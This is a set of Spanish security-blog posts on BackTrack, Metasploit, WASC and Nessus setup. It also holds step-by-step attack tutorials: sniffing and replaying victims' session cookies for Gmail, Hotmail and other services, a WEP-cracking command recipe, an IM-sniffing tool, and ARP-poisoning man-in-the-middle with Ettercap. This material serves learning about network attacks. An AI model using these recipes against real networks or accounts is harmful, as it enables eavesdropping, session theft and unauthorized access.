Pues, algunos ya se abrán percatado de que la distribución Linux orientada a seguridad más famosa cambió de página y que hace más de una semana salió la versión Final de la versión 4 … nos referimos a Backtrack, por supuesto.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

Bueno, la nueva página oficial la encontramos en: http://www.backtrack-linux.org/

Y nos podemos bajar la versión 4 de: http://www.backtrack-linux.org/downloads/

En lo personal, apenas en un rato pensaré en bajarme la distro, pues pesa 1570 MB y se va a llevar un rato, mientras terminaré algunas cosas que hacer, supongo

Salu2!

Bueno, en esta entrada aprovecharé para recomendar un curso que a lo mejor ya conocían de Metasploit … el curso de Metasploit Unleashed, el cual es gratuito pero aprovecha para captar donaciones de HFC (Hackers For Charity) para ayudar niños del Este de África (mas de HFC) .

Encontré información muy útil, y pues creo que es el curso más completo de Metasploit que hay (por lo menos gratuito, je, aparte que ni conosco muchos), solo hay algunas consideraciones, la primera es que está en inglés (para los que no les guste el idioma, pues abrá que dedicarle un rato) y la versión en PDF aun no está lista asi que solo lo podemos disfrutar en línea.

I consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins. The Metasploit Framework provides a truly impressive work environment.  The MSF is far more than just a collection of exploits, it’s an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel.

Vale muchísimo la pena darle una checada!

La dirección del curso es: http://www.offensive-security.com/metasploit-unleashed/

Bueno, esta mañana revisando el correo me topé con uno muy interesante, creo que viene de una lista de correos … donde anuncian que ha sido liberada la clasificación de amenazas por el Web Application Security Consortium (WASC), donde hacen una clasificación de debilidades y ataques que pueden llevar a comrpometer un sitio, datos o a los usuarios.

Bueno, dejo citado el email que recibí donde viene una explicación un poco más formal y los enlaces a los documentos respectivos, recomiendo bajar el pdf para que tengan la referencia a la mano, la ando checando y me parece muy interesante si queremos tratar asuntos más formales de seguridad:

The Web Application Security Consortium (WASC) is pleased to announce the long awaited release of the WASC
Threat Classification v2.0. The Threat Classification is an effort to classify the weaknesses, and attacks
that can lead to the compromise of a website, its data, or its users. This document’s primarily purpose is
to serve as a reference guide for common attacks and weaknesses.

Main goals
- Refine document scope, terminology, and purpose
- Update existing sections when applicable
- Add missing attacks and weaknesses
- Creation of a firm, scalable base foundation allowing for the introduction of data views allowing for various
forms of data representation
- Addition of attack and weakness reference identifiers (WASC-<xx>)
- Publication of two data views

WASC Threat Classification v2.0 Online
http://projects.webappsec.org/Threat-Classification

Using the Threat Classification
http://projects.webappsec.org/Using-the-Threat-Classification

Threat Classification Authors and Contributors
http://projects.webappsec.org/Threat-Classification-Authors

WASC Threat Classification FAQ
http://projects.webappsec.org/Threat-Classification-FAQ

WASC Reference Identifier Grid
http://projects.webappsec.org/Threat-Classification-Reference-Grid

Threat Classification Data Views
http://projects.webappsec.org/Threat-Classification-Views

Muy recomendado darle una checada

Probado en: Ubuntu Jaunty (9.04)

Bueno, al probar Ettercap en Ubuntu a lo mejor a más de uno le ha dado problemas… de que cuando quieren iniciar Scan for hosts se cierra la interfaz gráfica o cuando lo corremos en línea de comandos que nos arroja:

Dissector "dns" not supported (etter.conf line 70)
Ooops ! This shouldn't happen...
Segmentation Fault...

Bueno, pues la solución no es tan complicada… bastará con reinstalarlo… pero utilizando los paquetes en “drizzt” publicados por Timothy Redaelli.

Salu2!

Lo vi en: http://ubuntuforums.org/showthread.php?t=1160865

Solución: https://launchpad.net/~timothy-redaelli/+archive/ppa

Sidejacking: Robando sesiones mediante Cookies

Bueno, para el robo de Cookies podríamos utilizar programas como Hamster y Ferret … sin embargo, leyendo un tutorial buenisimo (pongo la fuente al final) me doy cuenta de que como podemos hacer lo mismo simplemente utilizando nuestro navegador Firefox y alguna que otra extensión .

No se considera Hijacking como tal el robo de sesiones mediante Cookies, por que realmente no se secuestra totalmente la sesión, solo obtenemos el permiso para entrar en una sesión, pero el usuario víctima no pierde ningún derecho o acceso. Asi que se trata de Sidejacking.

Bueno, claro que eso es solo para insertar la cookie. Primero tenemos que obtenerla y si estamos en una red switcheada, basta con hacer un Arp Poisoning (ataque MitM explicado con anterioridad en Apuntux) para que el tráfico pase a través de nuestra máquina.

Bueno, definamos conceptos con wikipedia: cookie, sidejacking,  sniffing.

Cookie: Una cookie (pronunciado ['ku.ki]; literalmente galleta) es un fragmento de información que se almacena en el disco duro del visitante de una página web a través de su navegador, a petición del servidor de la página. Esta información puede ser luego recuperada por el servidor en posteriores visitas. En ocasiones también se le llama “huella”.

De esta forma, los usos más frecuentes de las cookies son:
* Llevar el control de usuarios: cuando un usuario introduce su nombre de usuario y contraseña, se almacena una cookie para que no tenga que estar introduciéndolas para cada página del servidor. Sin embargo una cookie no identifica a una persona, sino a una combinación de computador y navegador.
* Conseguir información sobre los hábitos de navegación del usuario, e intentos de spyware, por parte de agencias de publicidad y otros. Esto puede causar problemas de privacidad y es una de las razones por la que las cookies tienen sus detractores.

Sidejacking: In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim’s computer (see HTTP cookie theft).

Sniffing: Un packet sniffer es un programa para monitorizar y analizar el tráfico en una red de computadoras, detectando los cuellos de botella y problemas que existan. También puede ser utilizado para “captar”, lícitamente o no, los datos que son transmitidos en la red.

¿Qué vamos a hacer?

Vamos a sniffear el tráfico esperando obtener (mediante un analizador de tráfico) la cookie de alguna víctima (puede ser de cuando el usuario se conecta a Gmail, Hotmail, etc). Luego ingresaremos esa cookie con el plugin “Add N Edit Cookies” de Firefox, lo podemos bajar de aqui: https://addons.mozilla.org/es-ES/firefox/addon/573

Momento… pero …

¿Que cookie en especial estamos buscando?

Bueno, para descubrir que Cookie es la encargada de nuestra sesión podemos utilizar el Add n Edit Cookies para ver cuales son las cookies que tenemos para un sitio donde hemos guardado nuestra sesión (Gmail, Hotmail, etc). Y de ahí solo queda borrar de una por una y verificar en cual ya no nos deja seguir accediendo a nuestra cuenta, ésa sería la cookie que buscamos. Otra forma de ver las Cookies para un sitio viene siendo en el mismo Firefox > Editar > Preferencias > Privacidad > Mostrar Cookies.

Otra forma es en el navegador, en la barra de direcciones poner: javascript:alert(“Cookies: “+document.cookie)

Ok … del documento que me estoy basando, hay un listado de las cookies específicas para algunos servicios… les dejo la tabla para su análisis:

Windows Live Hotmail (live.com) > RPSTAuth

Gmail (mail.google.com) > GX

Tuenti (tuenti.com) > sid

Myspace (myspace.com) > MYUSERINFO

Yahoo (yahoo.com) > T, Y (* se ocupan las 2)

Ebay (ebay.es) > nonsession, s, cid (se ocupan las 3)

Youtube (youtube.com) > LOGIN_INFO

Mercadolibre (mercadolibre.com.mx) > orghash, orgnickp, orguserid, orguseridp, orgpago (las 5 creo que se ocupan, o hagan pruebas jaja)

*Por confirmar

Como sniffear en Wireshark?

Recomendaciones:

- En Wireshark (corriendolo como root) ir a Capture > Interfaces > eth1 (o la que sea nuestra interfaz) y seleccionamos Options

- Para este caso, podemos dejar el capture filter como: tcp port http

- Corremos la captura de tráfico… y en el filter ponemos lo siguiente: http.cookie , con eso solamente visualizaremos los paquetes que incluyan Cookies

- Si ya sabemos que servicio buscar entonces podemos filtrar asi: http.cookie contains “gmail” u otra consulta podria ser http.cookie contains “mercadolibre”

- Seleccionamos el paquete que creamos nos pueda llevar a la información de la Cookie que necesitamos, haciendo Follow TCP Stream … (checa los POST, los GET /mail, cosas asi )

- Analizamos el Stream y vamos sacando la información de la Cookie que necesitemos, esa información la agregaremos con el Add n Edit Cookies

- En Firefox, vamos a Herramientas > Cookie Editor … damos click en Add y simplemente llenamos los datos con lo que hemos sniffeado, en el caso para Gmail sería algo como:

NAME: GX

CONTENT: Lo que sacamos en el Follow TCP Stream

HOST: mail.google.com (viene en las primeras líneas del Follow TCP Stream)

PATH: /

Si tienes duda de cual es la Cookie de la sesión… pues agrega todas! jajaja… y vas descartando posibilidades o hacemos la prueba de registrarnos en el sitio web del que queramos hacer el Sidejacking y vamos probando con eliminación cual es la Cookie de la sesión.

Salu2!

Fuente:

Capturando Cookies. http://usuarios.lycos.es/detodo1pokaso/descargas/CapturandoCookies_NiLHoP.pdf

Pues, me di a la tarea de buscar un Sniffer para conversaciones de MSN, se que contamos con herramientas como el wireshark o ettercap, pero en particular quería algo fácil de usar que me diera ordenadas las conversaciones sin necesidad de hacer gran magia o movimiento y me topé con IM Sniffer, el cual se me hizo bastante genial… y recordando el ataque de MiTM de entradas del blog anteriores tendremos garantizada la obtención de información en la mayoría de los casos.

Les dejo el resumen de lo que hace el programa, sacado de la página oficial del proyecto:

imsniff is a pcap-based instant messaging sniffer. It captures the IM traffic in the network and is able to log conversations, contact lists, profile information, incoming email notifications, other MSN events, etc. Tested in Linux and Windows.

Lo bajamos, descomprimimos, corremos el build y luego el programa y a jugar.

Pruebenlo!

http://sourceforge.net/projects/im-snif/

Bueno, realmente es uno de los temas más comunes el como “crackear” redes inalámbricas que manejan de cifrado WEP y hoy gracias a los avances (de desarrollo de software y hardware… más el trabajo de la comunidad involucrada) es un método realmente sencillo que no toma mucho tiempo. Sencillo? realmente, la utilización de las herramientas es sencilla, pero no significa que la base teórica lo sea. En fin, solo quiero comentar lo que se necesita de forma “genérica” para “crackear” una red inalámbrica.

Digo de forma genérica, por que hay mucha gente que a lo mejor no conoce backtrack, o wifislax … de hecho en lo personal yo prefiero tener en mi computadora los programas que necesito, la distribución Linux que manejo en mi computadora portátil es Ubuntu y en la de escritorio es Debian. Prefiero tener instalados en mi sistema operativo base los programas a estar utilizando Live-Cds aunque de hecho… me gusta basarme de ellos para saber que herramientas son interesantes, en fin.

En Ubuntu, creo que los programas están en los repositorios asi que no hay mucho lio.

La formula genérica es:

- Tener la suite de herramientas de aircrack-ng : http://www.aircrack-ng.org

- Tener el macchanger

- Que la tarjeta soporte la inyección de paquetes y el modo monitor.

De ahí en más, los pasos a manera de receta son:

# airmon-ng

# airmon-ng stop wlan0

# ifconfig wlan0 down

# macchanger –mac 00:11:22:33:44:55 wlan0

# airmon-ng start wlan0

# airodump-ng wlan0

Apretamos para detener push ctrl+c

• Copiamos el BSSID de la red que queramos crackear

# airodump-ng -c (numero del canal) -w wep123 –bssid (bssid) wlan0

- mientras pwr sea mas grande, mejor

- el #Data debe ser alrededor de 10mil, para forzarlo:

#aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0

#aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

Ahora esperamos a que nuestro #Data sobrepase los 20mil y al hacerlo ejecutar…

# aircrack-ng -n 64 -b (bssid) wep123-01.cap

Nota: El cap file esta en la carpeta home, puse wep123-01.cap pensando en que fue el primer intento.

Listo! sin tantas complicaciones.

Fuentes:

http://richieblog.wordpress.com/2008/07/31/crackear-una-wep-con-backtrack-3-tan-facil-poner-en-jaque-a-la-inalambrica/

ARP Poisoning: Ataque Man-in-the-Middle con Ettercap

o

Como Sniffear Redes Switcheadas (Wireshark)

Probando en: Ubuntu Jaunty.

¿Funciona ésto en Windows?: Recomiendo trabajar sobre Linux.

Bueno, probablemente muchos ya conoscan Wireshark, uno de los analizadores de protocolos más famosos con el cual podemos “analizar” el tráfico que se genera en nuestra red. Pero… muchos tal vez han querido probarlo en redes switcheados, lo dejan corriendo y al regresar se dan cuenta de que solo han capturado un monton de paquetes Broadcast. Pues bien, la razón de ésto es que en una red switcheada la comunicación en la red tiene que pasar por el switch (o router) a diferencia de en la redes donde antes había hubs.

¿Entonces es imposible capturar tráfico de una red así?

No, la verdad es que solo hay que agregar unos pasos más a solo abrir el Wireshark y empezar a analizar protocolos, necesitamos realizar un ataque MitM para que el tráfico pase a través de nuestra máquina y de ahí ya podamos analizarlo.

Ah si, y no importa si estás conectado por cable o inalámbrico, el concepto en si es el mismo.

Ok, esto suena bien para un administrador y suena mucho mejor para un atacante, así que empecemos a platicar sobre el tema y veamos si llegamos a alguna conclusión interesante.

Bueno, primero definamos algunos conceptos con definiciones Wikipedia así me ahorraré algo de trabajo jeje. Lo que buscamos es ir uniendo términos, para que no solo hagamos el ataque a la copy-paste o click por aqui y por allá si no que sepamso realmente lo que está pasando.

¿Qué es un ataque Man-in-the-Middle?

Un ataque man-in-the-middle (MitM o intermediario, en castellano) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas.

http://es.wikipedia.org/wiki/Ataque_Man-in-the-middle

¿Qué es ARP?

ARP son las siglas en inglés de Address Resolution Protocol (Protocolo de resolución de direcciones).Es un protocolo de nivel de red responsable de encontrar la dirección hardware (Ethernet MAC) que corresponde a una determinada dirección IP. Para ello se envía un paquete (ARP request) a la dirección de difusión de la red (broadcast (MAC = ff ff ff ff ff ff)) que contiene la dirección IP por la que se pregunta, y se espera a que esa máquina (u otra) responda (ARP reply) con la dirección Ethernet que le corresponde.

Cada máquina mantiene una caché con las direcciones traducidas para reducir el retardo y la carga. ARP permite a la dirección de Internet ser independiente de la dirección Ethernet, pero esto sólo funciona si todas las máquinas lo soportan.ARP está documentado en el RFC (Request For Comments) 826.El protocolo RARP realiza la operación inversa.

En Ethernet, la capa de enlace trabaja con direcciones físicas. El protocolo ARP se encarga de traducir las direcciones IP a direcciones MAC (direcciones físicas).Para realizar ésta conversión, el nivel de enlace utiliza las tablas ARP, cada interfaz tiene tanto una dirección IP como una dirección física MAC.

http://es.wikipedia.org/wiki/Address_Resolution_Protocol

Bueno… ahora solo nos falta definir una cosa más …

¿Qué es ARP Poisoning?

El ARP Spoofing, también conocido como ARP Poisoning o ARP Poison Routing, es una técnica usada para infiltrarse en una red Ethernet conmutada (basada en switch y no en hubs), que puede permitir al atacante husmear paquetes de datos en la LAN (red de área local), modificar el tráfico, o incluso detener el tráfico (conocido como DoS: Denegación de Servicio).

El principio del ARP Spoofing es enviar mensajes ARP falsos (falsificados, o spoofed) a la Ethernet. Normalmente la finalidad es asociar la dirección MAC del atacante con la dirección IP de otro nodo (el nodo atacado), como por ejemplo la puerta de enlace predeterminada (gateway). Cualquier tráfico dirigido a la dirección IP de ese nodo, será erróneamente enviado al atacante, en lugar de a su destino real.

El atacante, puede entonces elegir, entre reenviar el tráfico a la puerta de enlace predeterminada real (ataque pasivo o escucha), o modificar los datos antes de reenviarlos (ataque activo). El atacante puede incluso lanzar un ataque de tipo DoS (Denegación de Servicio) contra una víctima, asociando una dirección MAC inexistente con la dirección IP de la puerta de enlace predeterminada de la víctima.EL ataque de ARP Spoofing puede ser ejecutado desde una máquina controlada (el atacante ha conseguido previamente hacerse con el control de la misma: intrusión), un Jack Box, o bien la máquina del atacante está conectada directamente a la LAN Ethernet.

SWITCH <——— > Atacante <——- > Víctima

http://es.wikipedia.org/wiki/ARP_Spoofing

Bueno, ¿y la víctima se dará cuenta?

No, realmente no saben que están siendo snifeados. Pero, si revisan los cachés arp de las máquinas podrían ver si hay dos hosts con la misma dirección MAC y pues ahí si se dan cuenta de que algo raro pasa :O

Tiene lógica entonces… lo que haremos será envenenar las tablas ARP … para esto crearemos paquetes que mandaremos a la víctima y esperaremos que ésta modificque su tabla. Pero, entonces necesitaremos trabajar con un sniffer (proceso para analizar el tráfico en una red) activo y aquí es donde entra ettercap.

OJO! Vamos a generar tráfico con esto, por lo que un administrador de red despierto podría notar que algo “raro” pasa. De hecho a resumidas cuentas, la magia radica en que Ettercap generará muchos mensajes ARP (de ahí que se genera tanto tráfico, nada es gratis) con la idea de que lleguen antes que los del switch.

Paso 1. Instalación de Ettercap y Wireshark

Si no está en nuestros repositorios ir a: http://ettercap.sourceforge.net/

En nuestro caso, estamos en Ubuntu y la versión más reciente de Ettercap está en los repositorios, si queremos la interfaz visual hacemos:

# sudo aptitude install ettercap-gtk

Mmmm… también wireshark está en los repositorios… asi que no tiene caso seguir en este paso jeje.

Aah, pero no olvidemos habilitar el envío de paquetes, para que si nos llegan paquetes que no estén destinados a nosotros, los envie de todas formas, osea que trabaje como ruteador (buscamos no detener el flujo de datos):

# echo 1 > /proc/sys/net/ipv4/ip_forward

Paso 2. Trabajando con Ettercap

Bueno, para empezar el Sniffing nos vamos al menu Sniff > Unified sniffing … y seleccionamos la interfaz de red que queremos poner en modo monitor (la que quiere captar el tráfico).

Ok… una vez hecho ésto vemos que nuestro menú cambia y nos da más opciones, recomiendo ir preparando el terreno para que tengamos un panorama amplio de lo que se está capturando de tráfico.

Menús que vamos a activar:

Hosts > Host lists

View > Connections

View > Profiles

View > Statistics

Bueno, ya una vez que tengamos preparada la mesa, pues empezamos a hacer el Sniffing, para ésto nos vamos al menú: Start > Start Sniffing

Bueno… ahorita solo estamos capturando Broadcast y el tráfico que nosotros generamos (por decir si navegamos por Internet, etc). Lo cual está bien, pues estamos viendo que máquinas hay en la red, si quieres acelerar el proceso, puedes aventar un Ping Sweep con Nmap o abrir el Angry IP Scanner y barrer toda la red. De hecho, el mismo Ettercap cuenta con una opción para escanear hosts en el menú: Hosts > Scan for Hosts.

Ejemplo con Nmap:

# nmap -sP 192.168.1.0/24

En la pantalla del Ettercap checamos que tenemos en los perfiles:

Esas son las máquinas que nos interesan, les explico que hay en mi red:

192.168.1.254 > Un modem de Infinitum, con el que me conecto a Internet (2wire)

192.168.1.64 > Mi máquina conectada a la wireless

192.168.1.68 > La máquina de prueba (víctima)

Ok, ahora hay que planear quien será la máquina víctima… en nuestro caso será 192.168.1.68 y el otro target será el modem (router, switch, como le quieran llamar, que aunque en teoría no es lo mismo para un fin práctico aceleramos proceso).

Bueno, ahora pasemos a la magia del ataque.

Paso 3. ARP Poisoning

Ok … vamos bien… ya tenemos poblada nuestra lista de Profiles, ahora en esa misma ventana damos click en Convert to Host List para poblar nuestra pestaña de Host List. En Host List podemos ver las direcciones IP + MAC Address (la teoría cobra sentido, no?).

Bueno, pues elegimos a nuestra víctima como Target 1 (mi caso 192.168.1.68) y como Target 2 el router (192.168.1.254). Ahora solo basta con ir al menú Mitm> ARP Poisoning y seleccionamos la primera opción: Sniff Remote Connections. Damos un vistazo a la pestaña de Connections y nos damos cuenta que ya estamos capturando tráfico de la máquina víctima

Bueno, pero en lo personal no me gusta cómo se muestra el tráfico en Ettercap (aunque vaya, es como una navaja suiza, dense oportunidad de checar todas las opciones con las que cuenta) así que utilizaremos en vez para analizar el tráfico al buen Wireshark. Ojo! No cerramos Ettercap y corremos Wireshark como root (también Ettercap debe estar corriendo como root).

Paso 4. Analizando con Wireshark

Bueno, abrimos Wireshark, vamos al menú: Capture > Interfaces

Pero… bueno, a mi gusto no es tan interesante a veces capturar TOOOODO, así que en esa parte donde elegimos la interfaz, nos vamos a Options y daremos el siguiente filtro para solo tomar TCP que es lo que por lo general nos interesa mas… le damos en Start. Otro buen filtro podría ser “tcp port http”.

Listo! … misión cumplida. Creo que Wireshark es excelente por sus filtros, en el proximo howto espero hablar sobre Hijacking … y veremos como todo en realidad va relacionado

salu2! y ojala sea de utilidad.

Que tal, pues quise dedicarle un rato a Nessus y escribí un tutorial, a lo mejor les interesa … pongo un fragmento en el blog y les pongo la liga en Mediafire para que se descarguen mi artículo completo ojala sea de utilidad.

Probado en: Ubuntu Jaunty

Tratando de conocer más a Nessus

El día de hoy vamos a trabajar un poco con Nessus y vamos a ver que tanto podemos hacer con él. Si bien en otras entradas del blog ya he hablado sobre su instalación (servidor y cliente) es necesario ver una vez que ya lo tenemos… ¿Qué podemos hacer?

Bueno, antes de empezar a platicar sobre Nessus quisiera decirles que nunca me he considerado experto en nada, solo me gusta leer y experimentar las cosas que me parecen interesantes. Una de las formas que utilizo para aprender es documentar y el día de hoy quería darle una revisada a fondo al Nessus así que igual aprovecho para documentar lo que voy viendo y tal vez resultará en que le sea de utilidad a alguien, espero que así sea, sería doble ganancia

Ah un comando importante que podemos utilizar en consola para ver en que carpeta estamos es:

# pwd

Nota: En Ubuntu para estar como root podemos hacerlo de la siguiente manera

# sudo su

o

# sudo comando

Sobre el servidor de Nessus

Carpetas para Nessus

Ok, tenemos instalado el servidor de Nessus, una parte importante a saber es que carpetas utiliza Nessus, tenemos que para nuestro caso de Ubuntu quedaría de la siguiente forma:

/opt/nessus/etc/nessus > Archivos de configuración

/opt/nessus/var/nessus/users/<username>/kbs/ > Es la carpeta de la base de conocimientos

Donde <username> podría ser admin, o cualquier otro usuario que hayamos creado para Nessus.

Creando usuarios en Nessus

Para poder utilizar Nessus (hacer escaneos y toda la cosa) necesitamos crear por lo menos un usuario. Lo hacemos de la siguiente manera:

# /opt/nessus/sbin/nessus-adduser

Login : admin

Authentication (pass/cert) : [pass]

Login password :

Login password (again) :

Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins,

etc…) (y/n) [n]: y

User rules

(aqui solo damos enter)

nessusd has a rules system which allows you to restrict the hosts

that admin has the right to test. For instance, you may want

him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :

(the user can have an empty rules set)

Login : admin

Password : ***********

This user will have ‘admin’ privileges within the Nessus server

Rules :

Is that ok ? (y/n) [y] y

User added

#

Bueno y de todas formas por que tiene que tener permisos de administrador? Lo que pasa que un usuario que no tiene permisos de administrador en Nessus no puede subir plugins y cosas por el estilo.

Un servidor Nessus puede soportar múltiples usuarios

Pueden descargar el artículo completo de aqui: http://www.mediafire.com/?az5mzmybmz2

Salu2!

Instalando en: Ubuntu 9.04 – Jaunty Jackalope -

Arquitectura: amd64

¿Qué es Nessus?

Nessus es un programa de escaneo de vulnerabilidades en diversos sistemas operativos. Consiste en nessusd, el daemon Nessus, que realiza el escaneo en el sistema objetivo, y nessus, el cliente (basado en consola o gráfico) que muestra el avance y reporte de los escaneos. Desde consola nessus puede ser programado para hacer escaneos programados con cron.

En operación normal, nessus comienza escaneando los puertos con nmap o con su propio escaneador de puertos para buscar puertos abiertos y después intentar varios exploits para atacarlo. Las pruebas de vulnerabilidad, disponibles como una larga lista de plugins, son escritos en NASL (Nessus Attack Scripting Language, Lenguaje de Scripting de Ataque Nessus por sus siglas en inglés), un lenguaje scripting optimizado para interacciones personalizadas en redes.

Opcionalmente, los resultados del escaneo pueden ser exportados en reportes en varios formatos, como texto plano, XML, HTML, y LaTeX. Los resultados también pueden ser guardados en una base de conocimiento para referencia en futuros escaneos de vulnerabilidades.

Algunas de las pruebas de vulnerabilidades de Nessus pueden causar que los servicios o sistemas operativos se corrompan y caigan. El usuario puede evitar esto desactivando “unsafe test” (pruebas no seguras) antes de escanear.

http://es.wikipedia.org/wiki/Nessus

Bueno pues ya había hecho una entrada en el viejo blog sobre como instalar Nessus en Debian pero que pruebo Ubuntu en la laptop quiero instalar Nessus asi que describiré el proceso por si a alguien le sirve

Paso 1: Descargamos Nessus de http://www.nessus.org/download/nessus_download.php cuidando el elegir el paquete más acorde a nuestra arquitectura y distribución. (para mi caso Ubuntu 8.10 and 9.04 (64 bits) ).

Paso 2: Nos pasamos a root…

# sudo su

Vamos a la carpeta donde descargamos el .deb y ejecutamos:

# dpkg -i nombredenessus.deb

Puede tardar un rato en lo que procesa los plugins, pero bueno…

Tras la espera ya está instalado, ahora hablemos de configuraciones.

Configuraciones
Requerimos crear un Nessus user (los comandos deben ser escritos de forma completa, osea, con todo y path, no podemos entrar directo a la carpeta y ejecutarlos como ./ … ordenes del manual jaja), para hacerlo basta con dar el comando:

# /opt/nessus/sbin/nessus-adduser

Login: admin

Authentication (pass/cert) : [pass]

Login password: tupasswordaqui

Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]: y

Creamos un usuario con el nombre admin y cuando nos pregunte Authentication (pass/cert) solo damos Enter, y con esto por default tomará pass. Ahora bien cuando aparesca la parte donde te pregunta si quieres agregar reglas al usuario, podemos dejarlo vacío…lo que haría que este usuario tenga permiso de scanear cualquier rango de IP’s. Ok, entonces en esa parte apretamos soo damos ENTER y no escribimos nada de reglas por ahora (para nuestro caso no aplica). Y damos Enter cuando pregunte si todo esta bien.

¿Y si queríamos darle reglas de restricción al usuario creado? Pues lo ideal sería consultar el manual, pero en Debian antes de hacer “man nessus-adduser” hay que hacer:
# export MANPATH=/opt/nessus/man
# man nessus-adduser

Y como resumen sobre esto tenemos que la sintaxis en las reglas de nessus-adduser son:

accept | deny ip/mask
default accept | deny

Donde mask sería en CIDR y donde default debe ser la ultima regla, define la política del usuario. Ejemplo:

-El usuario puede ver cualquier red menos 192.168.1.0/24
deny 192.168.1.0/24
default accept

Para correr Nessus
# /opt/nessus/sbin/nessus-service -D
Con -D lo hacemos correr en background. Otras opciones:

-v : Nos da la version
-h : resumen de comandos
-p <port-number> : hacemos que escuche las conexiones de clientes en otro puerto en vez del 1241.

Activar el código de activación para los plugins (valga lo redundante de activar activaciones) :
Para solicitar un código de activación, podemos ir a la página: http://www.nessus.org/plugins/index.php … ister-info , nos lo mandan por correo, es funcional solo por 7 días y solo lo podemos usar una vez. (buscamos el Home Feed)

La guía de instalación nos da el siguiente método para activarlo y verificar que todo salió bien:

# cat /opt/nessus/lib/nessus/plugins/plugin_feed_info.inc
PLUGIN_SET = “200510041848″;
PLUGIN_FEED = “Release”;
# /opt/nessus/bin/nessus-fetch –register XXXX-XXXX-XXXX-XXXX-XXXX

Your activation code has been registered properly – thank you.
Now fetching the newest plugin set from plugins.nessus.org…
Your Nessus installation is now up-to-date.
If auto_update is set to ‘yes’ in nessusd.conf, Nessus will
update the plugins by itself.
# date
Thu Oct 13 11:15:35 EDT 2005
# cat /opt/nessus/lib/nessus/plugins/plugin_feed_info.inc
PLUGIN_SET = “200510131015″;
PLUGIN_FEED = “Direct”;

A nosotros si optamos por la opcion “gratuita” nos aparecería en PLUGIN_FEED algo como “Registered (7days delay)” o “Home Feed”. ¿Por qué? Bueno, si leimos en la página de Nessus a la hora de solicitar nuestro código de activación en la página nos decían algo como:

Professional and Home Plugin Feeds

Two feeds are available only for use with a copy of Nessus provided by Tenable – the ProfessionalFeed and the HomeFeed

A ‘ProfessionalFeed‘ is required for any organization of individual to use Nessus professionally. It offers vulnerability updates, support and more. Customers who purchase Tenable’s Security Center receive access to this feed with their annual product maintenance.

A ‘HomeFeed‘ is available for free to individual home users, and cannot be used by organizations or individuals professionally.

Verificar que el código haya sido registrado correctamente
# /opt/nessus/bin/nessus-fetch –check

Para el update de los plugins
# /opt/nessus/sbin/nessus-update-plugins

¿Cada cuando hacer update?
Normal: Una vez al dia
Necesidad de seguridad extrema: Una vez cada 4 horas
Nota: Hay opcion de auto_update en el nessusd.conf.

Ok, ahora tras estos pasos ya tenemos a nuestro servidor corriendo y listo para la acción, el siguiente paso es hacernos de un cliente, del NessusClient, el cual es una interfaz GUI para el Nessus. El único requisito en Debian para correrlo es tener X11 instalado jeje.

Bueno, pues nos bajamos el .deb de NessusClient de nessus.org y para instalarlo hacemos como root:
# dpkg -i paquetenessus.deb

Correr NessusClient
# /opt/nessus/bin/NessusClient

O tambien ya debería estar en: Aplicaciones-> Internet -> NessusClient

Y… bueno, dejaré por ahora este mini how-to en esta parte, para incitar a leer el Users Guide del NessusClient, por que hay mucho que hablar al respecto y bueno, muchos puntos son cubiertos ahí, jeje… también es de interés checar la advanced user guide para tener un panorama mas claro.

Bibliografía

http://www.nessus.org

Nessus 3.2 installation guide
NessusClient 3.2 users guide
man nessus-adduser

Notas: Todo lo que platico aqui viene en la documentación de Nessus por lo que sería buena idea darse una vuelta en los pdfs que se pueden descargar directo de la página de nessus.org , asi como checar los man para nessus. (man nessusd, man nessus-adduser, etc). Para configuraciones sobre /opt/nessus/etc/nessus/nessusd.conf ver el manual de instalación, ahi viene buena información para no saturar el funcionamiento de nuestro Nessus (como por ahí de la pagina 25). Y bueno, usted dirá… si todo viene en los manuales, ¿para que hacer esta guía?. La hago por varias razones, la principal es por que a mi me sirve leer y repasar la documentación jeje, la segunda por que tiendo a hacer resumenes de lo que leo y la tercera para tener una referencia corta ojala sea de utilidad.

Fuente original:

http://richieblog.wordpress.com/2008/07/02/tenable-nessus-en-debian/